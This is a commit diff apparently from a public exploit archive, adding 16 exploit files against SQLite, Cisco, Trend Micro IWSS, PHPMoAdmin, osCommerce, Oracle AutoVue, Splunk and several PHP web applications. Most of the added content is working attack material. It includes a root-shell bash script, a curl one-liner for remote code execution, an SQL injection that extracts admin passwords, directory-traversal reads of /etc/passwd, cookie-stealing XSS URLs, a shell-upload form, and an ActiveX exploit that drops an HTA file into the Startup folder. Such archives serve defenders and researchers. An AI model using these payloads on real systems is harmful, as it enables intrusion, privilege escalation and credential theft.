Update: 2015-03-05

16 new exploits
2015-03-05 08:36:06 +00:00 · 2015-03-05 08:36:06 +00:00 · 5dff5f8ab5
commit 5dff5f8ab5
parent ce06069fd4
17 changed files with 436 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -32620,6 +32620,7 @@ id,file,description,date,author,platform,type,port
 36187,platforms/php/webapps/36187.txt,"WordPress Black-LetterHead Theme 1.5 'index.php' Cross Site Scripting Vulnerability",2011-09-30,SiteWatch,php,webapps,0
 36188,platforms/windows/local/36188.txt,"Electronic Arts Origin Client 9.5.5 - Multiple Privilege Escalation Vulnerabilities",2015-02-26,LiquidWorm,windows,local,0
 36189,platforms/windows/local/36189.txt,"Ubisoft Uplay 5.0 - Insecure File Permissions Local Privilege Escalation",2015-02-26,LiquidWorm,windows,local,0
+36190,platforms/linux/dos/36190.txt,"SQLite3 3.8.6 - Controlled Memory Corruption PoC",2015-02-26,"Andras Kabai",linux,dos,0
 36191,platforms/php/webapps/36191.txt,"WordPress RedLine Theme 1.65 's' Parameter Cross Site Scripting Vulnerability",2011-09-30,SiteWatch,php,webapps,0
 36192,platforms/php/webapps/36192.txt,"A2CMS 'index.php' Local File Disclosure Vulnerability",2011-09-28,St493r,php,webapps,0
 36193,platforms/php/webapps/36193.txt,"WordPress WP Bannerize 2.8.7 'ajax_sorter.php' SQL Injection Vulnerability",2011-09-30,"Miroslav Stampar",php,webapps,0
@ -32664,3 +32665,18 @@ id,file,description,date,author,platform,type,port
 36238,platforms/multiple/remote/36238.txt,"Multiple Toshiba e-Studio Devices Security Bypass Vulnerability",2011-10-17,"Deral Heiland PercX",multiple,remote,0
 36239,platforms/hardware/remote/36239.txt,"Check Point UTM-1 Edge and Safe 8.2.43 Multiple Security Vulnerabilities",2011-10-18,"Richard Brain",hardware,remote,0
 36240,platforms/php/webapps/36240.txt,"Site@School 2.4.10 'index.php' Cross Site Scripting and SQL Injection Vulnerabilities",2011-10-18,"Stefan Schurtz",php,webapps,0
+36244,platforms/php/webapps/36244.txt,"Boonex Dolphin 6.1 'xml/get_list.php' SQL Injection Vulnerability",2011-10-19,"Yuri Goltsev",php,webapps,0
+36245,platforms/php/webapps/36245.txt,"Innovate Portal 2.0 'cat' Parameter Cross Site Scripting Vulnerability",2011-10-20,"Eyup CELIK",php,webapps,0
+36246,platforms/multiple/remote/36246.txt,"Splunk <= 4.1.6 'segment' Parameter Cross Site Scripting Vulnerability",2011-10-20,"Filip Palian",multiple,remote,0
+36247,platforms/multiple/dos/36247.txt,"Splunk <= 4.1.6 Web component Remote Denial of Service Vulnerability",2011-10-20,"Filip Palian",multiple,dos,0
+36248,platforms/php/webapps/36248.txt,"osCommerce Remote File Upload and File Disclosure Vulnerabilities",2011-10-20,indoushka,php,webapps,0
+36249,platforms/php/webapps/36249.txt,"Tine 2.0 Multiple Cross Site Scripting Vulnerabilities",2011-10-20,"High-Tech Bridge SA",php,webapps,0
+36250,platforms/windows/remote/36250.html,"Oracle AutoVue 20.0.1 'AutoVueX.ocx' ActiveX Control 'ExportEdaBom()' Insecure Method Vulnerability",2011-10-24,rgod,windows,remote,0
+36251,platforms/php/webapps/36251.txt,"PHPMoAdmin Unauthorized Remote Code Execution (0-Day)",2015-03-03,@u0x,php,webapps,80
+36252,platforms/php/webapps/36252.txt,"e107 0.7.24 'cmd' Parameter Remote Command Execution Vulnerability",2011-10-24,"Matt Bergin",php,webapps,0
+36253,platforms/php/webapps/36253.txt,"InverseFlow 2.4 Multiple Cross Site Scripting Vulnerabilities",2011-10-24,"Amir Expl0its",php,webapps,0
+36254,platforms/php/webapps/36254.txt,"Alsbtain Bulletin 1.5/1.6 Multiple Local File Include Vulnerabilities",2011-10-25,"Null H4ck3r",php,webapps,0
+36255,platforms/php/webapps/36255.txt,"vtiger CRM 5.2.1 'index.php' Multiple Cross Site Scripting Vulnerabilities",2011-10-26,LiquidWorm,php,webapps,0
+36256,platforms/hardware/remote/36256.txt,"Multiple Cisco Products 'file' Parameter Directory Traversal Vulnerability",2011-10-26,"Sandro Gauci",hardware,remote,0
+36257,platforms/linux/local/36257.txt,"Trendmicro IWSS 3.1 Local Privilege Escalation Vulnerability",2011-10-26,"Buguroo Offensive Security",linux,local,0
+36258,platforms/windows/remote/36258.txt,"XAMPP 1.7.4 Multiple Cross Site Scripting Vulnerabilities",2011-10-26,Sangteamtham,windows,remote,0
--- a/platforms/hardware/remote/36256.txt
+++ b/platforms/hardware/remote/36256.txt
@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/50372/info
+
+Multiple Cisco products are prone to a directory-traversal vulnerability.
+
+Exploiting this issue will allow an attacker to read arbitrary files from locations outside of the application's current directory. This could help the attacker launch further attacks.
+
+This issue is tracked by Cisco BugID CSCts44049 and CSCth09343.
+
+The following products are affected:
+
+Cisco Unified IP Interactive Voice Response
+Cisco Unified Contact Center Express
+Cisco Unified Communications Manager 
+
+http://www.example.com/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd
+
+http://www.example.com/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../usr/local/platform/conf/platformConfig.xml 
--- a/platforms/linux/dos/36190.txt
+++ b/platforms/linux/dos/36190.txt
@ -0,0 +1,154 @@
+# Exploit Title: SQLite3 controlled memory corruption PoC (0day)
+# Date: [date]
+# Exploit Author: Andras Kabai
+# Vendor Homepage: http://www.sqlite.org/
+# Software Link: http://www.sqlite.org/download.html
+# Version: 3.8.6, 3.8.8.3
+# Tested on: Ubuntu 14.10, 64 bit 3.8.6 (latest available package), 3.8.8.3 (built from the latest source code)
+
+Using a crafted input (e.g. from a malicious file via “-init” parameter or directly given to the std input of the program) it is possible to trigger a memory corruption vulnerability in the most recent version of SQLite3. The memory corruption could be controlled, therefore the program flow could be manipulated by the attacker.
+
+The following sections demonstrates the attack against the apt-get installed installed and updated sqlite3 and against a newer version that is built from source.
+
+====
+
+andrew@ubufuzzx6401:~/issues/sqlite$ which sqlite3
+/usr/bin/sqlite3
+andrew@ubufuzzx6401:~/issues/sqlite$ /usr/bin/sqlite3 -version
+3.8.6 2014-08-15 11:46:33 9491ba7d738528f168657adb43a198238abde19e
+andrew@ubufuzzx6401:~/issues/sqlite$ gdb64 /usr/bin/sqlite3
+GNU gdb (Ubuntu 7.8-1ubuntu4) 7.8.0.20141001-cvs
+Copyright (C) 2014 Free Software Foundation, Inc.
+License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
+This is free software: you are free to change and redistribute it.
+There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
+and "show warranty" for details.
+This GDB was configured as "x86_64-linux-gnu".
+Type "show configuration" for configuration details.
+For bug reporting instructions, please see:
+<http://www.gnu.org/software/gdb/bugs/>.
+Find the GDB manual and other documentation resources online at:
+<http://www.gnu.org/software/gdb/documentation/>.
+For help, type "help".
+Type "apropos word" to search for commands related to "word"...
+Reading symbols from /usr/bin/sqlite3...(no debugging symbols found)...done.
+(gdb) set disassembly-flavor intel
+(gdb) set args < sqlitepoc.txt
+(gdb) r
+Starting program: /usr/bin/sqlite3 < sqlitepoc.txt
+warning: the debug information found in "/lib64/ld-2.19.so" does not match "/lib64/ld-linux-x86-64.so.2" (CRC mismatch).
+
+[Thread debugging using libthread_db enabled]
+Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
+Usage: .trace FILE|off
+Error: near line 4: near "whatever": syntax error
+Usage: .trace FILE|off
+
+Program received signal SIGSEGV, Segmentation fault.
+0x00007ffff7ba06a0 in sqlite3_load_extension () from /usr/lib/x86_64-linux-gnu/libsqlite3.so.0
+(gdb) i r
+rax            0x138	312
+rbx            0x41414141424242	18367622009733698
+rcx            0x7fffffffb590	140737488336272
+rdx            0x0	0
+rsi            0x555555779b43	93824994483011
+rdi            0x41414141424242	18367622009733698
+rbp            0x555555779b43	0x555555779b43
+rsp            0x7fffffffb4c0	0x7fffffffb4c0
+r8             0x555555779b41	93824994483009
+r9             0x6c	108
+r10            0x0	0
+r11            0x0	0
+r12            0x555555779b48	93824994483016
+r13            0x7fffffffb590	140737488336272
+r14            0x555555779b40	93824994483008
+r15            0x2	2
+rip            0x7ffff7ba06a0	0x7ffff7ba06a0 <sqlite3_load_extension+736>
+eflags         0x10246	[ PF ZF IF RF ]
+cs             0x33	51
+ss             0x2b	43
+ds             0x0	0
+es             0x0	0
+fs             0x0	0
+gs             0x0	0
+(gdb) disas $rip,+10
+Dump of assembler code from 0x7ffff7ba06a0 to 0x7ffff7ba06aa:
+=> 0x00007ffff7ba06a0 <sqlite3_load_extension+736>:	call   QWORD PTR [rbx+0x48]
+   0x00007ffff7ba06a3 <sqlite3_load_extension+739>:	mov    r15,rax
+   0x00007ffff7ba06a6 <sqlite3_load_extension+742>:	lea    rax,[rip+0x12bc1]        # 0x7ffff7bb326e
+End of assembler dump.
+
+===
+
+andrew@ubufuzzx6401:~/tmp/build/sqlite-autoconf-3080803/.libs$ ./lt-sqlite3 -version
+3.8.8.3 2015-02-25 13:29:11 9d6c1880fb75660bbabd693175579529785f8a6b
+andrew@ubufuzzx6401:~/tmp/build/sqlite-autoconf-3080803/.libs$ gdb64 ./lt-sqlite3
+GNU gdb (Ubuntu 7.8-1ubuntu4) 7.8.0.20141001-cvs
+Copyright (C) 2014 Free Software Foundation, Inc.
+License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
+This is free software: you are free to change and redistribute it.
+There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
+and "show warranty" for details.
+This GDB was configured as "x86_64-linux-gnu".
+Type "show configuration" for configuration details.
+For bug reporting instructions, please see:
+<http://www.gnu.org/software/gdb/bugs/>.
+Find the GDB manual and other documentation resources online at:
+<http://www.gnu.org/software/gdb/documentation/>.
+For help, type "help".
+Type "apropos word" to search for commands related to "word"...
+Reading symbols from ./lt-sqlite3...done.
+(gdb) set disassembly-flavor intel
+(gdb) set args < /home/andrew/issues/sqlite/sqlitepoc.txt
+(gdb) r
+Starting program: /home/andrew/tmp/build/sqlite-autoconf-3080803/.libs/lt-sqlite3 < /home/andrew/issues/sqlite/sqlitepoc.txt
+warning: the debug information found in "/lib64/ld-2.19.so" does not match "/lib64/ld-linux-x86-64.so.2" (CRC mismatch).
+
+[Thread debugging using libthread_db enabled]
+Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
+Usage: .trace FILE|off
+Error: near line 4: near "whatever": syntax error
+Usage: .trace FILE|off
+
+Program received signal SIGSEGV, Segmentation fault.
+sqlite3LoadExtension (pzErrMsg=0x7fffffffb510, zProc=0x0, zFile=0x6261c3 "CCCCBBBBAAAA", db=0x6261c8) at sqlite3.c:36169
+36169	      }
+(gdb) i r
+rax            0x138	312
+rbx            0x41414141424242	18367622009733698
+rcx            0x7fffffffb510	140737488336144
+rdx            0x0	0
+rsi            0x6261c3	6447555
+rdi            0x41414141424242	18367622009733698
+rbp            0x6261c3	0x6261c3
+rsp            0x7fffffffb440	0x7fffffffb440
+r8             0x6261c1	6447553
+r9             0x6c	108
+r10            0x7fffffffb270	140737488335472
+r11            0x7ffff7b5ae50	140737349267024
+r12            0x6261c8	6447560
+r13            0x7fffffffb510	140737488336144
+r14            0x6261c0	6447552
+r15            0x2	2
+rip            0x7ffff7b5b130	0x7ffff7b5b130 <sqlite3_load_extension+736>
+eflags         0x10246	[ PF ZF IF RF ]
+cs             0x33	51
+ss             0x2b	43
+ds             0x0	0
+es             0x0	0
+fs             0x0	0
+gs             0x0	0
+(gdb) disas $rip,+10
+Dump of assembler code from 0x7ffff7b5b130 to 0x7ffff7b5b13a:
+=> 0x00007ffff7b5b130 <sqlite3_load_extension+736>:	call   QWORD PTR [rbx+0x48]
+   0x00007ffff7b5b133 <sqlite3_load_extension+739>:	mov    r15,rax
+   0x00007ffff7b5b136 <sqlite3_load_extension+742>:	lea    rax,[rip+0x587d8]        # 0x7ffff7bb3915
+End of assembler dump.
+
+====
+
+andrew@ubufuzzx6401:~/issues/sqlite$ hexdump -C sqlitepoc.txt
+00000000  3b 0a 2e 74 20 78 0a 2e  74 0a 77 68 61 74 65 76  |;..t x..t.whatev|
+00000010  65 72 00 0a 3b 0a 2e 74  0a 2e 6f 70 0a 2e 6c 20  |er..;..t..op..l |
+00000020  43 43 43 43 42 42 42 42  41 41 41 41 0a           |CCCCBBBBAAAA.|
+0000002d
--- a/platforms/linux/local/36257.txt
+++ b/platforms/linux/local/36257.txt
@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/50380/info
+
+Trendmicro IWSS is prone to a local privilege-escalation vulnerability.
+
+Local attackers can exploit this issue to execute arbitrary code with root privileges and completely compromise the affected computer.
+
+Trendmicro IWSS 3.1 is vulnerable; other versions may also be affected. 
+
+#!/bin/bash
+# Copyright 2011 Buguroo Offensive Security - jrvilla.AT.buguroo.com
+
+cd /tmp
+echo "[*] Creating shell file"
+echo -e "#!/bin/bash\n/bin/bash" > PatchExe.sh
+echo "[*] Change permissions"
+chmod 755 PatchExe.sh
+echo "[*] Got r00t... Its free!"
+/opt/trend/iwss/data/patch/bin/patchCmd u root
--- a/platforms/multiple/dos/36247.txt
+++ b/platforms/multiple/dos/36247.txt
@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/50298/info
+
+Splunk is prone to a remote denial-of-service vulnerability.
+
+Exploiting this issue will exhaust system resources and cause the application to crash, denying service to legitimate users. 
+
+http://www.example.com/en-US/prototype/segmentation_performance?lines=999&depth=99999999&segment=foo&element=span&attribute=class&segmentation=nested
+
+http://www.example.com/en-US/prototype/segmentation_performance?lines=99999999999999999999999999999999999999&depth=99999999999999999999999999999999999999&segment=foo&element=span&attribute=class&segmentation=nested
+https://localhost/en-US/debug/sso 
--- a/platforms/multiple/remote/36246.txt
+++ b/platforms/multiple/remote/36246.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/50296/info
+
+Splunk is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary HTML and script code in an unsuspecting user's browser in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Splunk versions 4.2.2 and prior are vulnerable. 
+
+http://www.example.com/en-US/prototype/segmentation_performance?lines=2&depth=2&segment=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&element=aaa&attribute=aaa&segmentation=flattened 
--- a/platforms/php/webapps/36244.txt
+++ b/platforms/php/webapps/36244.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/50286/info
+
+Boonex Dolphin is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+Boonex Dolphin 6.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/xml/get_list.php?dataType=ApplyChanges&iNumb=1&iIDcat=(select 1 from AdminMenu where 1=1 group by concat((select password from Admins),rand(0)|0) having min(0) ) 
--- a/platforms/php/webapps/36245.txt
+++ b/platforms/php/webapps/36245.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/50295/info
+
+Innovate Portal is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary HTML and script code in an unsuspecting user's browser in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/index.php?cat=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28948044%29%3c%2fScRiPt%3e&content=error&sid=57cdbb83e0ab1b879e0a0f91fbf22781&what=user_notfound 
--- a/platforms/php/webapps/36248.txt
+++ b/platforms/php/webapps/36248.txt
@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/50301/info
+
+osCommerce is prone to a remote file upload and a file disclosure vulnerability. The issues occur because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit these issues to upload a file and obtain an arbitrary file's content; other attacks are also possible. 
+
+The following URL is available for the file disclosure vulnerability:
+
+http://www.example.com/admin/shop_file_manager.php/login.php/login.php?action=download&filename=/includes/_includes_configure.php
+
+The following exploit is available for the remote file upload vulnerability: 
+
+<html><head><title> creloaded - Remote File Upload </title></head> <br><br><u>UPLOAD FILE:</u><br> <form name="file" action="https://www.example.com/admin/shop_file_manager.php/login.php?action=processuploads" method="post" enctype="multipart/form-data"> <input type="file" name="file_1"><br> <input name="submit" type="submit" value=" Upload " > </form> <br><u>CREATE FILE:</u><br> <form name="new_file" action="https://www.example.com/admin/shop_file_manager.php/login.php?action=save" method="post"> FILE NAME:<br> <input type="text" name="filename">&nbsp; (ex. shell.php)<br>FILE CONTENTS:<br> <textarea name="file_contents" wrap="soft" cols="70" rows="10">&lt;/textarea&gt; <input name="submit" type="submit" value=" Save " > </form> 
--- a/platforms/php/webapps/36249.txt
+++ b/platforms/php/webapps/36249.txt
@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/50307/info
+
+Tine is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
+
+An attacker could exploit these vulnerabilities to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Tine 2.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/library/idnaconvert/example.php?lang=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+
+http://www.example.com/library/idnaconvert/example.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+
+http://www.example.com/library/phpexcel/phpexcel/shared/jama/docs/download.php/%27%3E%3Cscript%3Ealert%28document.cooki e%29;%3C/script%3E
--- a/platforms/php/webapps/36251.txt
+++ b/platforms/php/webapps/36251.txt
@ -0,0 +1,87 @@
+######################################################################
+#  _     ___  _   _  ____  ____    _  _____
+#  | |   / _ \| \ | |/ ___|/ ___|  / \|_   _|
+#  | |  | | | |  \| | |  _| |     / _ \ | |
+#  | |__| |_| | |\  | |_| | |___ / ___ \| |
+#  |_____\___/|_| \_|\____|\____/_/   \_\_|
+#
+# PHPMoAdmin Unauthorized Remote Code Execution (0-Day)
+# Website : http://www.phpmoadmin.com/
+# Exploit Author : @u0x (Pichaya Morimoto), Xelenonz, pe3z, Pistachio
+# Release dates : March 3, 2015
+#
+# Special Thanks to 2600 Thailand group
+# https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/
+#
+########################################################################
+
+[+] Description
+============================================================
+PHPMoAdmin is a MongoDB administration tool for PHP built on a
+stripped-down version of the Vork high-performance framework.
+
+[+] Exploit
+============================================================
+Someone was trying to sale this shit for 3000usd lolz
+
+$ curl "http://path.to/moadmin.php" -d "object=1;system('id');exit"
+
+[+] Proof-of-Concept
+============================================================
+PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7
+
+POST /moadmin/moadmin.php HTTP/1.1
+Host: 192.168.33.10
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0)
+Gecko/20100101 Firefox/36.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: keep-alive
+Pragma: no-cache
+Cache-Control: no-cache
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 34
+
+object=1;system('id;ls -lha');exit
+
+HTTP/1.1 200 OK
+Date: Tue, 03 Mar 2015 16:57:40 GMT
+Server: Apache/2.4.7 (Ubuntu)
+Set-Cookie: PHPSESSID=m0ap55aonsj5ueph7hgku0elb1; path=/
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
+pre-check=0
+Pragma: no-cache
+Vary: Accept-Encoding
+Content-Length: 223
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html
+
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+total 116K
+drwxr-xr-x 1 longcat longcat  102 Mar  3 16:55 .
+drwxr-xr-x 6 root    root    4.0K Mar  3 16:17 ..
+-rw-rw-r-- 1 longcat longcat 112K Mar  3 16:55 moadmin.php
+
+[+] Vulnerability Analysis
+============================================================
+Filename: moadmin.php
+1. create new moadminComponent object
+1977: $mo = new moadminComponent;
+
+2. if the http-post parameter 'object' is set
+738: class moadminComponent {
+...
+762: public function __construct() {
+...
+786: if (isset($_POST['object'])) {
+787:    if (self::$model->saveObject($_GET['collection'],
+$_POST['object'])) {
+...
+
+3. evaluate the value of 'object' as PHP code
+692: public function saveObject($collection, $obj) {
+693:    eval('$obj=' . $obj . ';'); //cast from string to array
--- a/platforms/php/webapps/36252.txt
+++ b/platforms/php/webapps/36252.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/50339/info
+
+e107 is prone to a remote command-execution vulnerability because it fails to properly validate user-supplied input.
+
+An attacker can exploit this issue to execute arbitrary commands within the context of the vulnerable application.
+
+e107 0.7.24 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/e107_config.php?cmd=id 
--- a/platforms/php/webapps/36253.txt
+++ b/platforms/php/webapps/36253.txt
@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/50344/info
+
+InverseFlow is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
+
+An attacker could exploit these vulnerabilities to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+InverseFlow 2.4 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/inver/inverseflow/ticketview.php?email= [XSS]
+
+http://www.example.com/inver/inverseflow/ticketview.php?email=&id=[XSS]
+
+http://www.example.com/inver/inverseflow/login.php?redirect=[XSS] 
--- a/platforms/php/webapps/36254.txt
+++ b/platforms/php/webapps/36254.txt
@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/50350/info
+
+Alsbtain Bulletin is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+Alsbtain Bulletin 1.5 and 1.6 are vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?style=[LFI]%00
+http://www.example.com/index.php?act=[LFI]%00 
--- a/platforms/php/webapps/36255.txt
+++ b/platforms/php/webapps/36255.txt
@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/50364/info
+
+vtiger CRM is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+vtiger CRM 5.2.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/modules/mobile/index.php?_operation="><script>alert(1)</script>
+http://www.example.com/modules/mobile/index.php?_operation=listModuleRecords&module=Services&search="><script>alert(1)</script>
--- a/platforms/windows/remote/36250.html
+++ b/platforms/windows/remote/36250.html
@ -0,0 +1,31 @@
+source: http://www.securityfocus.com/bid/50332/info
+
+Oracle AutoVue 'AutoVueX.ocx' ActiveX control is prone to a vulnerability caused by an insecure method.
+
+Successfully exploiting this issue will allow attackers to create or overwrite arbitrary files on a victim's computer within the context of the affected application (typically Internet Explorer) that uses the ActiveX control.
+
+Oracle AutoVue 20.0.1 is vulnerable; other versions may also be affected. 
+
+<!--
+Oracle AutoVue AutoVueX ActiveX Control ExportEdaBom Remote Code Execution 
+
+ProgID: AUTOVUEX.AutoVueXCtrl.1
+CLSID: {B6FCC215-D303-11D1-BC6C-0000C078797F}
+Binary path: C:\PROGRA~1\av\avwin\AutoVueX.ocx
+Safe for initialization (registry): true
+Safe for scripting (registry): true
+
+rgod
+-->
+<!-- saved from url=(0014)about:internet --> 
+<html>
+<object classid='clsid:B6FCC215-D303-11D1-BC6C-0000C078797F' id='obj' width=640 & height=480 />
+<param name=SRC value="PADS_Evaluation_board.pcb"></param>
+</object>
+<script defer="defer">
+var sh = "<" + "SCRIPT> var x=new ActiveXObject(\"WScript.Shell\"); x.Exec(\"CALC.EXE\"); <" +"/SCRIPT>";
+for (i=0; i<6666; i++) { 
+    obj.ExportEdaBom("../../../../../../../../../../../Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\sh.hta","aaaa",true,sh);
+}
+window.location.href = window.location.href;
+</script>
--- a/platforms/windows/remote/36258.txt
+++ b/platforms/windows/remote/36258.txt
@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/50381/info
+
+XAMPP is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+These issues affect XAMPP 1.7.4 for Windows and prior. 
+
+http://www.example.com/xampp/ming.php?text=[xss]
+http://www.example.com/xampp/cds.php/[xss]